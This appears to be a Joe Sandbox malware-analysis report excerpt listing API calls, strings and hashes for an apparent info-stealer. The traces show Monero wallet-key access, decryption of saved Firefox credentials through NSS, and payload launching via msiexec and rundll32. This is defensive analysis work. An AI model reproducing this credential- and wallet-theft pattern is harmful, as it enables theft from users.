Part of subcall function 6C5C4730: GetModuleHandleW.KERNEL32(00000000,?,?,?,?,6C5C44B2,6C63E21C,6C63F7F8), ref: 6C5C473E
Part of subcall function 6C5C4730: GetProcAddress.KERNEL32(00000000,GetNtLoaderAPI), ref: 6C5C474A

GetModuleHandleW.KERNEL32(WRusr.dll), ref: 6C5C44BA
LoadLibraryW.KERNEL32(kernel32.dll), ref: 6C5C44D2
InitOnceExecuteOnce.KERNEL32(6C63F80C,6C5BF240,?,?), ref: 6C5C451A
GetModuleHandleW.KERNEL32(user32.dll), ref: 6C5C455C
LoadLibraryW.KERNEL32(?), ref: 6C5C4592
InitializeCriticalSection.KERNEL32(6C63F770), ref: 6C5C45A2
moz_xmalloc.MOZGLUE(00000008), ref: 6C5C45AA
moz_xmalloc.MOZGLUE(00000018), ref: 6C5C45BB
InitOnceExecuteOnce.KERNEL32(6C63F818,6C5BF240,?,?), ref: 6C5C4612
?IsWin32kLockedDown@mozilla@@YA_NXZ.MOZGLUE ref: 6C5C4636
LoadLibraryW.KERNEL32(user32.dll), ref: 6C5C4644
memset.VCRUNTIME140(?,00000000,00000114), ref: 6C5C466D
VerSetConditionMask.NTDLL ref: 6C5C469F
VerSetConditionMask.NTDLL ref: 6C5C46AB
VerSetConditionMask.NTDLL ref: 6C5C46B2
VerSetConditionMask.NTDLL ref: 6C5C46B9
VerSetConditionMask.NTDLL ref: 6C5C46C0
VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6C5C46CD
GetModuleHandleW.KERNEL32(00000000), ref: 6C5C46F1
GetProcAddress.KERNEL32(00000000,NativeNtBlockSet_Write), ref: 6C5C46FD

Strings

l, xrefs: 6C5C4578
WRusr.dll, xrefs: 6C5C44B5
NativeNtBlockSet_Write, xrefs: 6C5C46F7
Gcl, xrefs: 6C5C44FC
kernel32.dll, xrefs: 6C5C44CD
user32.dll, xrefs: 6C5C4557, 6C5C463F

Memory Dump Source

Source File: 00000000.00000002.1957137509.000000006C5B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5B0000, based on PE: true

Associated: 00000000.00000002.1957123713.000000006C5B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957182154.000000006C62D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957200148.000000006C63E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957319931.000000006C642000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5b0000_file.jbxd

Similarity

API ID: ConditionMask$HandleModuleOnce$LibraryLoad$AddressExecuteInitProcmoz_xmalloc$CriticalDown@mozilla@@InfoInitializeLockedSectionVerifyVersionWin32kmemset
String ID: Gcl$NativeNtBlockSet_Write$WRusr.dll$kernel32.dll$l$user32.dll
API String ID: 1702738223-3152901021
Opcode ID: 8af01d8ca78087aada6b35f6a1d5e92505e1841620780192a011c6c3e39c5428
Instruction ID: 919f29f553ca2f52baa50a4df13d673125a0b537075fb7be9f0effb6309ee5d5
Opcode Fuzzy Hash: 8af01d8ca78087aada6b35f6a1d5e92505e1841620780192a011c6c3e39c5428
Instruction Fuzzy Hash: F2610BB0704344AFEB209FA6CC89FA57BF4EB46308F04A59CE90C9B641D7B58945CF56

Function 0025C990 Relevance: 28.4, APIs: 15, Strings: 1, Instructions: 384filestringCOMMON

Download Yara Rule

APIs

NSS_Init.NSS3(00000000), ref: 0025C9A5

Part of subcall function 0026A740: lstrcpy.KERNEL32(00270E17,00000000), ref: 0026A788

Part of subcall function 0026A920: lstrcpy.KERNEL32(00000000,?), ref: 0026A972
Part of subcall function 0026A920: lstrcat.KERNEL32(00000000), ref: 0026A982

Part of subcall function 0026A8A0: lstrcpy.KERNEL32(?,00270E17), ref: 0026A905

Part of subcall function 0026A9B0: lstrlen.KERNEL32(?,00D49078,?,\Monero\wallet.keys,00270E17), ref: 0026A9C5
Part of subcall function 0026A9B0: lstrcpy.KERNEL32(00000000), ref: 0026AA04
Part of subcall function 0026A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0026AA12

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,00D4D038,00000000,?,0027144C,00000000,?,?), ref: 0025CA6C
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0025CA89
GetFileSize.KERNEL32(00000000,00000000), ref: 0025CA95
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0025CAA8
ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0025CAD9
StrStrA.SHLWAPI(?,00D4D0E0,00270B52), ref: 0025CAF7
StrStrA.SHLWAPI(00000000,00D4CF30), ref: 0025CB1E
StrStrA.SHLWAPI(?,00D4D6A0,00000000,?,00271458,00000000,?,00000000,00000000,?,00D49198,00000000,?,00271454,00000000,?), ref: 0025CCA2
StrStrA.SHLWAPI(00000000,00D4D7E0), ref: 0025CCB9

Part of subcall function 0025C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0025C871
Part of subcall function 0025C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0025C87C
Part of subcall function 0025C820: PK11_GetInternalKeySlot.NSS3 ref: 0025C88A
Part of subcall function 0025C820: PK11_Authenticate.NSS3(00000000,00000001,00000000), ref: 0025C8A5
Part of subcall function 0025C820: PK11SDR_Decrypt.NSS3(?,?,00000000), ref: 0025C8EB
Part of subcall function 0025C820: PK11_FreeSlot.NSS3(?), ref: 0025C961

StrStrA.SHLWAPI(?,00D4D7E0,00000000,?,0027145C,00000000,?,00000000,00D49218), ref: 0025CD5A
StrStrA.SHLWAPI(00000000,00D48FA8), ref: 0025CD71

Part of subcall function 0025C820: lstrcat.KERNEL32(?,00270B46), ref: 0025C943
Part of subcall function 0025C820: lstrcat.KERNEL32(?,00270B47), ref: 0025C957
Part of subcall function 0025C820: lstrcat.KERNEL32(?,00270B4E), ref: 0025C978

lstrlen.KERNEL32(00000000), ref: 0025CE44
CloseHandle.KERNEL32(00000000), ref: 0025CE9C
NSS_Shutdown.NSS3 ref: 0025CEAA

Strings

, xrefs: 0025C9C6

Memory Dump Source

Source File: 00000000.00000002.1935243410.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.1935203729.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000030D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000033F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000003F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000415000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000049A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000738000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000747000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935827962.0000000000748000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935928823.00000000008E2000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_file.jbxd

Yara matches

Similarity

API ID: Filelstrcat$lstrcpy$K11_lstrlen$PointerSlot$AuthenticateBinaryCloseCreateCryptDecryptFreeHandleInitInternalReadShutdownSizeString
String ID:
API String ID: 1052888304-3916222277
Opcode ID: 3bba390cd1cecea43f376f81c56dd97cdade917cf5922adb266e7bc99a1b50fb
Instruction ID: 10876827e04d6fe9cbc9ab8eab83334ccb0b46e6a68f6083a3087c38c54ae2de
Opcode Fuzzy Hash: 3bba390cd1cecea43f376f81c56dd97cdade917cf5922adb266e7bc99a1b50fb
Instruction Fuzzy Hash: B4E10171920108ABDB14EFA4DC96FEEB778AF14300F504169F50677191EF306AAACFA5

Function 6C5C9590 Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 192libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 6C5B31C0: LoadLibraryW.KERNEL32(KernelBase.dll), ref: 6C5B3217
Part of subcall function 6C5B31C0: GetProcAddress.KERNEL32(00000000,QueryInterruptTime), ref: 6C5B3236
Part of subcall function 6C5B31C0: FreeLibrary.KERNEL32 ref: 6C5B324B
Part of subcall function 6C5B31C0: __Init_thread_footer.LIBCMT ref: 6C5B3260
Part of subcall function 6C5B31C0: ?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(?), ref: 6C5B327F
Part of subcall function 6C5B31C0: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C5B328E
Part of subcall function 6C5B31C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C5B32AB
Part of subcall function 6C5B31C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C5B32D1
Part of subcall function 6C5B31C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6C5B32E5
Part of subcall function 6C5B31C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6C5B32F7

LoadLibraryW.KERNEL32(Api-ms-win-core-memory-l1-1-5.dll), ref: 6C5C9675
__Init_thread_footer.LIBCMT ref: 6C5C9697
LoadLibraryW.KERNEL32(ntdll.dll), ref: 6C5C96E8
GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 6C5C9707
__Init_thread_footer.LIBCMT ref: 6C5C971F
SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C5C9773
GetProcAddress.KERNEL32(00000000,MapViewOfFileNuma2), ref: 6C5C97B7
FreeLibrary.KERNEL32 ref: 6C5C97D0
FreeLibrary.KERNEL32 ref: 6C5C97EB
SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C5C9824

Strings

NtMapViewOfSection, xrefs: 6C5C9701
MapViewOfFileNuma2, xrefs: 6C5C97B1
Api-ms-win-core-memory-l1-1-5.dll, xrefs: 6C5C9670
ntdll.dll, xrefs: 6C5C96E3

Memory Dump Source

Source File: 00000000.00000002.1957137509.000000006C5B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5B0000, based on PE: true

Associated: 00000000.00000002.1957123713.000000006C5B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957182154.000000006C62D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957200148.000000006C63E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957319931.000000006C642000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5b0000_file.jbxd

Similarity

API ID: LibraryTime$StampV01@@Value@mozilla@@$AddressFreeInit_thread_footerLoadProc$ErrorLastStamp@mozilla@@$Creation@Now@ProcessV12@V12@_
String ID: Api-ms-win-core-memory-l1-1-5.dll$MapViewOfFileNuma2$NtMapViewOfSection$ntdll.dll
API String ID: 3361784254-3880535382
Opcode ID: 8d48f7722a6f1cf0a6f7c5fadc6df407a128df1d823a5c3bf0f8734b5bfa135a
Instruction ID: 617b937319aa56bf7c11ff5218e1cc108bcc5f4d2f7f25fb558ab7e54a1c8820
Opcode Fuzzy Hash: 8d48f7722a6f1cf0a6f7c5fadc6df407a128df1d823a5c3bf0f8734b5bfa135a
Instruction Fuzzy Hash: CF61E271700201DBDF20DFAAECD8B9A7BB4EB8A318F00655DE91987790D7309854CB9B

Function 00269010 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184COMMON

Download Yara Rule

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0026906C

Strings

image/jpeg, xrefs: 00269136

Memory Dump Source

Source File: 00000000.00000002.1935243410.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.1935203729.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000030D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000033F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000003F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000415000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000049A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000738000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000747000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935827962.0000000000748000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935928823.00000000008E2000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_file.jbxd

Yara matches

Similarity

API ID: CreateGlobalStream
String ID: image/jpeg
API String ID: 2244384528-3785015651
Opcode ID: 2a416a28606e7982940836e5922ca2c521826679d827a5a973afc0ff1232bd92
Instruction ID: b3c56011b60412053ab6682a858c24c371ca76d148dc726b8015e2e04b662d91
Opcode Fuzzy Hash: 2a416a28606e7982940836e5922ca2c521826679d827a5a973afc0ff1232bd92
Instruction Fuzzy Hash: 55711CB1910208ABCB04EFE4DC99FEEB7B8BF58300F108129F515A7290DB74A955CFA5

Function 6C60D4D0 Relevance: 21.2, APIs: 14, Instructions: 165threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C60D4F0
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C60D4FC
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C60D52A
GetCurrentThreadId.KERNEL32 ref: 6C60D530
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C60D53F
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C60D55F
free.MOZGLUE(00000000), ref: 6C60D585
?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6C60D5D3
GetCurrentThreadId.KERNEL32 ref: 6C60D5F9
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C60D605
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C60D652
GetCurrentThreadId.KERNEL32 ref: 6C60D658
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C60D667
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C60D6A2

Memory Dump Source

Source File: 00000000.00000002.1957137509.000000006C5B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5B0000, based on PE: true

Associated: 00000000.00000002.1957123713.000000006C5B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957182154.000000006C62D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957200148.000000006C63E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957319931.000000006C642000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5b0000_file.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThread$Xbad_function_call@std@@free
String ID:
API String ID: 2206442479-0
Opcode ID: 8ac058817d4d46333b0f16450b5cb6d2492b2075c2daaf7c7c65de2ff9f5044c
Instruction ID: a8d2db9eed380cbba694c972245f95f60393d0dd912aa1556be9d8546e86feaf
Opcode Fuzzy Hash: 8ac058817d4d46333b0f16450b5cb6d2492b2075c2daaf7c7c65de2ff9f5044c
Instruction Fuzzy Hash: ED518C71604B05DFC714DF35C888A9ABBF4FF89358F009A2EE84A97750DB30A855CB99

Function 002617A0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,block), ref: 002617C5
ExitProcess.KERNEL32 ref: 002617D1

Strings

block, xrefs: 002617B7

Memory Dump Source

Source File: 00000000.00000002.1935243410.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.1935203729.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000030D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000033F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000003F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000415000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000049A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000738000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000747000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935827962.0000000000748000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935928823.00000000008E2000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_file.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID: block
API String ID: 621844428-2199623458
Opcode ID: bdff8be61d3fa903a67089fcbd98a98391e116528add4583a4b6a4976b13dd83
Instruction ID: a2f72ddd1ba6871d7f124b7e13ba4753ed5404bcd060d96dcf2d40110e94fd56
Opcode Fuzzy Hash: bdff8be61d3fa903a67089fcbd98a98391e116528add4583a4b6a4976b13dd83
Instruction Fuzzy Hash: EC5180B4A21209EFDB04DFA1D998ABE77B5FF44304F188459E406A7240D770E9B5CF62

Function 00262E30 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON

Download Yara Rule

APIs

Part of subcall function 0026A740: lstrcpy.KERNEL32(00270E17,00000000), ref: 0026A788

ShellExecuteEx.SHELL32(0000003C), ref: 002631C5
ShellExecuteEx.SHELL32(0000003C), ref: 0026335D
ShellExecuteEx.SHELL32(0000003C), ref: 002634EA

Strings

/i ", xrefs: 002633E4
"" , xrefs: 0026309A
.dll, xrefs: 002631E5
<, xrefs: 00263490
/passive, xrefs: 0026345B
C:\Windows\system32\msiexec.exe, xrefs: 002634BF
C:\Windows\system32\rundll32.exe, xrefs: 00263332
.msi, xrefs: 00263398

Memory Dump Source

Source File: 00000000.00000002.1935243410.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.1935203729.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000030D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000033F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000003F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000415000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000049A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000738000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000747000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935827962.0000000000748000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935928823.00000000008E2000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_file.jbxd

Yara matches

Similarity

API ID: ExecuteShell$lstrcpy
String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
API String ID: 2507796910-3625054190
Opcode ID: 2d0c5b87587a34181669c4c9f0fa22f2ec5d0b9ab9eb5208df32feed1abf6ca0
Instruction ID: 55eabc1f7dc2834e095edffe0d05a2b84483ec8e1f31450d1c8af52bf7b4732e
Opcode Fuzzy Hash: 2d0c5b87587a34181669c4c9f0fa22f2ec5d0b9ab9eb5208df32feed1abf6ca0
Instruction Fuzzy Hash: 9312DC718201089ADB15EFA0DD92FEEB778AF14300F504169E50777191EF746BAACFA2

Function 6C5FEC70 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 81threadsynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 6C5F9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C5C4A68), ref: 6C5F945E
Part of subcall function 6C5F9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C5F9470
Part of subcall function 6C5F9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C5F9482
Part of subcall function 6C5F9420: __Init_thread_footer.LIBCMT ref: 6C5F949F

GetCurrentThreadId.KERNEL32 ref: 6C5FEC84
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C5FEC8C

Part of subcall function 6C5F94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C5F94EE
Part of subcall function 6C5F94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C5F9508

GetCurrentThreadId.KERNEL32 ref: 6C5FECA1
AcquireSRWLockExclusive.KERNEL32(6C63F4B8), ref: 6C5FECAE
?profiler_init@baseprofiler@mozilla@@YAXPAX@Z.MOZGLUE(00000000), ref: 6C5FECC5
ReleaseSRWLockExclusive.KERNEL32(6C63F4B8), ref: 6C5FED0A
WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C5FED19
CloseHandle.KERNEL32(?), ref: 6C5FED28
free.MOZGLUE(00000000), ref: 6C5FED2F
ReleaseSRWLockExclusive.KERNEL32(6C63F4B8), ref: 6C5FED59

Strings

[I %d/%d] profiler_ensure_started, xrefs: 6C5FEC94

Memory Dump Source

Source File: 00000000.00000002.1957137509.000000006C5B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5B0000, based on PE: true

Associated: 00000000.00000002.1957123713.000000006C5B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957182154.000000006C62D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957200148.000000006C63E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957319931.000000006C642000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5b0000_file.jbxd

Similarity

API ID: ExclusiveLockgetenv$CurrentReleaseThread$?profiler_init@baseprofiler@mozilla@@AcquireCloseHandleInit_thread_footerObjectSingleWait__acrt_iob_func__stdio_common_vfprintf_getpidfree
String ID: [I %d/%d] profiler_ensure_started
API String ID: 4057186437-125001283
Opcode ID: 6de9860afcbba0d54714fa6077b3b224d8490b0b2b56a5222e106c5d5d95b565
Instruction ID: 0aecbde792b3c1f12d41a56fc189d09a342bc4bdd2c76b7f207317f083e72b38
Opcode Fuzzy Hash: 6de9860afcbba0d54714fa6077b3b224d8490b0b2b56a5222e106c5d5d95b565
